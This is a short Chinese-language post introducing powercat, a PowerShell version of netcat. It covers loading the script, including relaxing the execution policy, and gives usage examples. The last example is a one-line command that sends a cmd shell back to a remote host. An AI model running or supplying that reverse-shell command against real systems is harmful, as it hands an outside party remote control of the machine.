对于一个熟悉网络的人来说,netcat并不会是一个陌生的工具。他有着网络工具中的“瑞士军刀”的美誉。它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它。使用nc所能完成的事情令人惊讶。 最近有人在github上发布了powershell版的netcat——powercat。 开源地址 https://github.com/besimorhino/powercat 加载方法 powercat实际上是一个powershell的函数,当你第一次使用它的时候你需要运行脚本来加载这个函数。 由于windows默认不允许任何脚本运行,你需要输入Set-ExecutionPolicy RemoteSigned来允许运行本地的脚本。(该操作需要管理员权限,所以还是有点小坑…) 然后下载该脚本,然后进入powershell命令行,运行 . .\powercat.ps1(注意两个点号之间有个空格,代表共享当前控制台的作用域,这样函数才能正常运行,小编在这里被坑了很久…) 或者简单一点,直接运行
使用方法 和标准的nc使用方法是一样的。 例子: 监听一个本地端口 powercat -l -p 8000 连接一个端口 powercat -c 10.1.1.1 -p 443 反弹一个cmd shell powercat -c 10.1.1.1 -p 443 -e cmd |